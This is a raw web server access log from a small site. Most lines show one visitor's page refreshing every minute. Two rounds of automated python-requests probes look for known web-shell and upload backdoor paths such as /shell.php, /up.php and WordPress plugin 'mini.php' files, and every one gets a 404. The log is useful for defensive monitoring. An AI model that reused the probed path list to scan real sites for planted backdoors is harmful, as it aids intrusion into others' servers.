178.115.41.55 - - [04/Jun/2023:18:42:41 +0200] "GET /gui/javascript/form_form.js?1685896961 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=896900" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:43:42 +0200] "GET /entry.php?id=10271&&ser=896961 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=896900" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:43:42 +0200] "GET /gui/javascript/form_form.js?1685897022 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=896961" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:44:43 +0200] "GET /entry.php?id=10271&&ser=897022 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=896961" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:44:43 +0200] "GET /gui/javascript/form_form.js?1685897083 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897022" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:45:44 +0200] "GET /entry.php?id=10271&&ser=897083 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897022" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:45:44 +0200] "GET /gui/javascript/form_form.js?1685897144 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897083" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:46:45 +0200] "GET /entry.php?id=10271&&ser=897144 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897083" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:46:45 +0200] "GET /gui/javascript/form_form.js?1685897205 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897144" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:47:46 +0200] "GET /entry.php?id=10271&&ser=897205 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897144" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:47:46 +0200] "GET /gui/javascript/form_form.js?1685897266 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897205" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:48:47 +0200] "GET /entry.php?id=10271&&ser=897266 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897205" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:48:47 +0200] "GET /gui/javascript/form_form.js?1685897327 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897266" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:49:48 +0200] "GET /entry.php?id=10271&&ser=897327 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897266" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:49:48 +0200] "GET /gui/javascript/form_form.js?1685897388 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897327" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:50:49 +0200] "GET /entry.php?id=10271&&ser=897388 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=897327" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:50:49 +0200] "GET /gui/javascript/form_form.js?1685897449 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897388" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:51:50 +0200] "GET /entry.php?id=10271&&ser=897449 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897388" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:51:50 +0200] "GET /gui/javascript/form_form.js?1685897510 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897449" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:52:51 +0200] "GET /entry.php?id=10271&&ser=897510 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=897449" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:52:51 +0200] "GET /gui/javascript/form_form.js?1685897571 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897510" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:53:52 +0200] "GET /entry.php?id=10271&&ser=897571 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897510" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:53:52 +0200] "GET /gui/javascript/form_form.js?1685897632 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897571" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:54:53 +0200] "GET /entry.php?id=10271&&ser=897632 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897571" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:54:53 +0200] "GET /gui/javascript/form_form.js?1685897693 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897632" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:55:54 +0200] "GET /entry.php?id=10271&&ser=897693 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897632" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:55:54 +0200] "GET /gui/javascript/form_form.js?1685897754 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897693" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:56:55 +0200] "GET /entry.php?id=10271&&ser=897754 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897693" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:56:55 +0200] "GET /gui/javascript/form_form.js?1685897815 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897754" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:57:56 +0200] "GET /entry.php?id=10271&&ser=897815 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897754" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:57:56 +0200] "GET /gui/javascript/form_form.js?1685897876 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897815" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
20.187.94.76 - - [04/Jun/2023:18:58:05 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:18:58:20 +0200] "GET /up.php HTTP/1.1" 404 288 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:18:58:35 +0200] "GET /upload.php HTTP/1.1" 404 291 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:18:58:51 +0200] "GET /wp-content/uploads/ HTTP/1.1" 404 297 "-" "python-requests/2.27.1"
178.115.41.55 - - [04/Jun/2023:18:58:57 +0200] "GET /entry.php?id=10271&&ser=897876 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897815" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:58:57 +0200] "GET /gui/javascript/form_form.js?1685897937 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897876" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
20.187.94.76 - - [04/Jun/2023:18:59:06 +0200] "GET /wp-content/uploads/2023/06/ HTTP/1.1" 404 304 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:18:59:20 +0200] "GET /shell.php HTTP/1.1" 404 290 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:18:59:35 +0200] "GET /wp-admin/network/wp-footer.php HTTP/1.1" 404 304 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:18:59:50 +0200] "GET /wp-info.php HTTP/1.1" 404 292 "-" "python-requests/2.27.1"
178.115.41.55 - - [04/Jun/2023:18:59:58 +0200] "GET /entry.php?id=10271&&ser=897937 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897876" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:18:59:58 +0200] "GET /gui/javascript/form_form.js?1685897998 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897937" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
20.187.94.76 - - [04/Jun/2023:19:00:08 +0200] "GET /wp-content/vuln.php HTTP/1.1" 404 297 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:19:00:24 +0200] "GET /upel.php HTTP/1.1" 404 289 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:19:00:39 +0200] "GET /wp-content/plugins/ppus/up.php HTTP/1.1" 404 305 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:19:00:54 +0200] "GET /098.php HTTP/1.1" 404 290 "-" "python-requests/2.27.1"
178.115.41.55 - - [04/Jun/2023:19:00:59 +0200] "GET /entry.php?id=10271&&ser=897998 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897937" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:00:59 +0200] "GET /gui/javascript/form_form.js?1685898059 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897998" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
20.187.94.76 - - [04/Jun/2023:19:01:09 +0200] "GET /V5.php HTTP/1.1" 404 289 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:19:01:24 +0200] "GET /new_license.php HTTP/1.1" 404 294 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:19:01:41 +0200] "GET /wp-content/plugins/theme-configurator/mini.php HTTP/1.1" 404 315 "-" "python-requests/2.27.1"
103.110.32.156 - - [04/Jun/2023:19:01:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)"
20.187.94.76 - - [04/Jun/2023:19:01:57 +0200] "GET /wp-content/plugins/widget-logic/mini.php HTTP/1.1" 404 313 "-" "python-requests/2.27.1"
178.115.41.55 - - [04/Jun/2023:19:02:00 +0200] "GET /entry.php?id=10271&&ser=898059 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=897998" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:02:00 +0200] "GET /gui/javascript/form_form.js?1685898120 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898059" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:03:01 +0200] "GET /entry.php?id=10271&&ser=898120 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=898059" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:03:01 +0200] "GET /gui/javascript/form_form.js?1685898181 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898120" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:04:02 +0200] "GET /entry.php?id=10271&&ser=898181 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898120" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:04:02 +0200] "GET /gui/javascript/form_form.js?1685898242 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898181" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:05:03 +0200] "GET /entry.php?id=10271&&ser=898242 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898181" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:05:03 +0200] "GET /gui/javascript/form_form.js?1685898303 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898242" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:06:04 +0200] "GET /entry.php?id=10271&&ser=898303 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898242" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:06:04 +0200] "GET /gui/javascript/form_form.js?1685898364 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898303" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:07:05 +0200] "GET /entry.php?id=10271&&ser=898364 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898303" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:07:05 +0200] "GET /gui/javascript/form_form.js?1685898425 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898364" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:08:06 +0200] "GET /entry.php?id=10271&&ser=898425 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898364" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:08:06 +0200] "GET /gui/javascript/form_form.js?1685898486 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898425" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:09:07 +0200] "GET /entry.php?id=10271&&ser=898486 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=898425" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:09:07 +0200] "GET /gui/javascript/form_form.js?1685898547 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898486" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:10:08 +0200] "GET /entry.php?id=10271&&ser=898547 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=898486" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:10:08 +0200] "GET /gui/javascript/form_form.js?1685898608 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898547" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:11:09 +0200] "GET /entry.php?id=10271&&ser=898608 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898547" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:11:09 +0200] "GET /gui/javascript/form_form.js?1685898669 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898608" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:12:10 +0200] "GET /entry.php?id=10271&&ser=898669 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898608" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:12:10 +0200] "GET /gui/javascript/form_form.js?1685898730 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898669" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:13:11 +0200] "GET /entry.php?id=10271&&ser=898730 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=898669" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:13:11 +0200] "GET /gui/javascript/form_form.js?1685898791 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898730" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
20.187.94.76 - - [04/Jun/2023:19:13:58 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:19:14:11 +0200] "GET /up.php HTTP/1.1" 404 290 "-" "python-requests/2.27.1"
178.115.41.55 - - [04/Jun/2023:19:14:12 +0200] "GET /entry.php?id=10271&&ser=898791 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=898730" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:14:12 +0200] "GET /gui/javascript/form_form.js?1685898852 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898791" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
20.187.94.76 - - [04/Jun/2023:19:14:27 +0200] "GET /upload.php HTTP/1.1" 404 293 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:19:14:41 +0200] "GET /wp-content/uploads/ HTTP/1.1" 404 298 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:19:14:56 +0200] "GET /wp-content/uploads/2023/06/ HTTP/1.1" 404 305 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:19:15:11 +0200] "GET /shell.php HTTP/1.1" 404 292 "-" "python-requests/2.27.1"
178.115.41.55 - - [04/Jun/2023:19:15:13 +0200] "GET /entry.php?id=10271&&ser=898852 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898791" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:15:13 +0200] "GET /gui/javascript/form_form.js?1685898913 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898852" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
20.187.94.76 - - [04/Jun/2023:19:15:25 +0200] "GET /wp-admin/network/wp-footer.php HTTP/1.1" 404 306 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:19:15:37 +0200] "GET /wp-info.php HTTP/1.1" 404 294 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:19:15:52 +0200] "GET /wp-content/vuln.php HTTP/1.1" 404 299 "-" "python-requests/2.27.1"
1.192.195.5 - - [04/Jun/2023:19:16:01 +0200] "\x16\x03\x01\x01#\x01" 400 383 "-" "-"
20.187.94.76 - - [04/Jun/2023:19:16:07 +0200] "GET /upel.php HTTP/1.1" 404 291 "-" "python-requests/2.27.1"
178.115.41.55 - - [04/Jun/2023:19:16:14 +0200] "GET /entry.php?id=10271&&ser=898913 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898852" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:16:14 +0200] "GET /gui/javascript/form_form.js?1685898974 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898913" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
1.192.192.8 - - [04/Jun/2023:19:16:18 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
20.187.94.76 - - [04/Jun/2023:19:16:21 +0200] "GET /wp-content/plugins/ppus/up.php HTTP/1.1" 404 307 "-" "python-requests/2.27.1"
1.192.195.8 - - [04/Jun/2023:19:16:22 +0200] "GET /layout.php HTTP/1.1" 200 817 "http://hat.progipark.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
1.192.192.6 - - [04/Jun/2023:19:16:27 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
1.192.195.8 - - [04/Jun/2023:19:16:30 +0200] "GET /robots.txt HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
1.192.192.4 - - [04/Jun/2023:19:16:35 +0200] "GET /sitemap.xml HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
20.187.94.76 - - [04/Jun/2023:19:16:35 +0200] "GET /098.php HTTP/1.1" 404 291 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:19:16:57 +0200] "GET /V5.php HTTP/1.1" 404 290 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:19:17:14 +0200] "GET /new_license.php HTTP/1.1" 404 296 "-" "python-requests/2.27.1"
178.115.41.55 - - [04/Jun/2023:19:17:15 +0200] "GET /entry.php?id=10271&&ser=898974 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898913" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
178.115.41.55 - - [04/Jun/2023:19:17:15 +0200] "GET /gui/javascript/form_form.js?1685899035 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
20.187.94.76 - - [04/Jun/2023:19:17:28 +0200] "GET /wp-content/plugins/theme-configurator/mini.php HTTP/1.1" 404 317 "-" "python-requests/2.27.1"
20.187.94.76 - - [04/Jun/2023:19:17:44 +0200] "GET /wp-content/plugins/widget-logic/mini.php HTTP/1.1" 404 314 "-" "python-requests/2.27.1"
